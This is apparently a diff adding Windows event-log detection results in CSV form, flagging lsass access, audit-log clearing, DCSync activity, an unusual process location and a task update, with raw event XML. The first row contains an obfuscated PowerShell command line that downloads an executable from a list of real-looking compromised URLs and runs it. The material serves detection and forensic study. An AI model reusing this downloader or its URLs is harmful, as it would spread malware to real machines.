+	CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Item): &quot;New-Item&quot; 
+ParameterBinding(New-Item): name=&quot;ItemType&quot;; value=&quot;DIrectOry&quot; 
+ParameterBinding(New-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\&quot; 
+</Data>
+    <Binary></Binary>
+  </EventData>
+</Event>",DESKTOP-RIPCLIP,Windows PowerShell
+non-system accounts getting a handle to and accessing lsass,1583705494.340693,2020-03-09T02:11:34.340693+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4663,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Security
+non-system accounts getting a handle to and accessing lsass,1583705494.340584,2020-03-09T02:11:34.340584+04:00,,Audit,High,Non-system account ( IEUser ) with process ( C:\Windows\System32\cscript.exe ) got access to object ( \Device\HarddiskVolume1\Windows\System32\lsass.exe ) of type ( Process ),4656,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4656</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340479Z"">
+    </TimeCreated>
+    <EventRecordID>314461</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""TransactionId"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""AccessList"">%%1537 
+				%%1538 
+				%%1539 
+				%%1540 
+				%%1541 
+				%%4480 
+				%%4481 
+				%%4482 
+				%%4483 
+				%%4484 
+				%%4485 
+				%%4486 
+				%%4487 
+				%%4488 
+				%%4489 
+				%%4490 
+				%%4491 
+				%%4492 
+				%%4493 
+				</Data>
+    <Data Name=""AccessReason"">-</Data>
+    <Data Name=""AccessMask"">0x1f3fff</Data>
+    <Data Name=""PrivilegeList"">-</Data>
+    <Data Name=""RestrictedSidCount"">0</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Security
+Audit log cleared,1556393475.355063,2019-04-27T23:31:15.355063+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:27:55.274060Z"">
+    </TimeCreated>
+    <EventRecordID>4987</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""824"" ThreadID=""6060"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
+      <SubjectUserName>IEUser</SubjectUserName>
+      <SubjectDomainName>IEWIN7</SubjectDomainName>
+      <SubjectLogonId>0xffa8</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",IEWIN7,Security
+Audit log cleared,1600198172.174941,2020-09-15T23:29:32.174941+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:17.594374Z"">
+    </TimeCreated>
+    <EventRecordID>768617</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""264"" ThreadID=""796"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
+      <SubjectUserName>a-jbrown</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x4c331</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1557281451.611176,2019-05-08T06:10:51.611176+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4662</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14080</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
+    </TimeCreated>
+    <EventRecordID>202793</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""4632"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
+    <Data Name=""SubjectUserName"">Administrator</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40c6511</Data>
+    <Data Name=""ObjectServer"">DS</Data>
+    <Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
+    <Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
+    <Data Name=""OperationType"">Object Access</Data>
+    <Data Name=""HandleId"">0x0</Data>
+    <Data Name=""AccessList"">%%7688 
+				</Data>
+    <Data Name=""AccessMask"">0x100</Data>
+    <Data Name=""Properties"">%%7688 
+		{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} 
+	{19195a5b-6da0-11d0-afd3-00c04fd930c9} 
+</Data>
+    <Data Name=""AdditionalInfo"">-</Data>
+    <Data Name=""AdditionalInfo2""></Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1557281451.580169,2019-05-08T06:10:51.580169+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4662</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14080</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
+    </TimeCreated>
+    <EventRecordID>202792</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""4632"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
+    <Data Name=""SubjectUserName"">Administrator</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40c6511</Data>
+    <Data Name=""ObjectServer"">DS</Data>
+    <Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
+    <Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
+    <Data Name=""OperationType"">Object Access</Data>
+    <Data Name=""HandleId"">0x0</Data>
+    <Data Name=""AccessList"">%%7688 
+				</Data>
+    <Data Name=""AccessMask"">0x100</Data>
+    <Data Name=""Properties"">%%7688 
+		{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} 
+	{19195a5b-6da0-11d0-afd3-00c04fd930c9} 
+</Data>
+    <Data Name=""AdditionalInfo"">-</Data>
+    <Data Name=""AdditionalInfo2""></Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1600340264.254575,2020-09-17T14:57:44.254575+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:37.013214Z"">
+    </TimeCreated>
+    <EventRecordID>769792</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""264"" ThreadID=""7672"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
+      <SubjectUserName>a-jbrown</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x4c331</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1557281443.487217,2019-05-08T06:10:43.487217+04:00,,Threat,High,User Name ( Administrator ) is suspected doing dcsync attack ,4662,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4662</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14080</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-08T02:10:43.487217Z"">
+    </TimeCreated>
+    <EventRecordID>202791</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""4632"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-500</Data>
+    <Data Name=""SubjectUserName"">Administrator</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40c6511</Data>
+    <Data Name=""ObjectServer"">DS</Data>
+    <Data Name=""ObjectType"">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
+    <Data Name=""ObjectName"">%{c6faf700-bfe4-452a-a766-424f84c29583}</Data>
+    <Data Name=""OperationType"">Object Access</Data>
+    <Data Name=""HandleId"">0x0</Data>
+    <Data Name=""AccessList"">%%7688 
+				</Data>
+    <Data Name=""AccessMask"">0x100</Data>
+    <Data Name=""Properties"">%%7688 
+		{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} 
+	{19195a5b-6da0-11d0-afd3-00c04fd930c9} 
+</Data>
+    <Data Name=""AdditionalInfo"">-</Data>
+    <Data Name=""AdditionalInfo2""></Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1595449776.414827,2020-07-23T00:29:36.414827+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-22T20:29:27.321769Z"">
+    </TimeCreated>
+    <EventRecordID>887106</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""8"" ThreadID=""6640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
+      <SubjectUserName>a-jbrown</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x3a17a</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+Process running in Unusual location,1638898381.636384,2021-12-07T21:33:01.636384+04:00,,Threat,High,"User Name : ( MSEDGEWIN10$ )  with process : ( \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Security
+schedule task updated,1553518420.276615,2019-03-25T16:53:40.276615+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4702</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T12:52:45.500611Z"">
+    </TimeCreated>
+    <EventRecordID>198239223</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3616"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">DC1$</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""TaskName"">\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask</Data>
+    <Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.4&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;RegistrationInfo&gt; 
+    &lt;Source&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Source&gt; 
+    &lt;Author&gt;$(@%systemroot%\system32\sppc.dll,-200)&lt;/Author&gt; 
+    &lt;Version&gt;1.0&lt;/Version&gt; 
+    &lt;Description&gt;$(@%systemroot%\system32\sppc.dll,-201)&lt;/Description&gt; 
+    &lt;URI&gt;\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask&lt;/URI&gt; 
+    &lt;SecurityDescriptor&gt;D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)(A;;FR;;;S-1-5-87-2912274048-3994893941-1669128114-1310430903-1263774323)&lt;/SecurityDescriptor&gt; 
+  &lt;/RegistrationInfo&gt; 
+  &lt;Triggers&gt; 
+    &lt;CalendarTrigger&gt; 
+      &lt;StartBoundary&gt;2019-03-26T12:51:45Z&lt;/StartBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+      &lt;ScheduleByDay&gt; 
+        &lt;DaysInterval&gt;1&lt;/DaysInterval&gt; 
+      &lt;/ScheduleByDay&gt; 
+    &lt;/CalendarTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;NetworkService&quot;&gt; 
+      &lt;UserId&gt;S-1-5-20&lt;/UserId&gt; 
+      &lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt; 
+    &lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt; 
+    &lt;UseUnifiedSchedulingEngine&gt;true&lt;/UseUnifiedSchedulingEngine&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+    &lt;RestartOnFailure&gt; 
+      &lt;Interval&gt;PT1M&lt;/Interval&gt; 
+      &lt;Count&gt;3&lt;/Count&gt; 
+    &lt;/RestartOnFailure&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;NetworkService&quot;&gt; 
+    &lt;ComHandler&gt; 
+      &lt;ClassId&gt;{B1AEBB5D-EAD9-4476-B375-9C3ED9F32AFC}&lt;/ClassId&gt; 
+      &lt;Data&gt;&lt;![CDATA[timer]]&gt;&lt;/Data&gt; 
+    &lt;/ComHandler&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1645007839.637236,2022-02-16T14:37:19.637236+04:00,,Audit,Critical,Audit log cleared by user ( jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
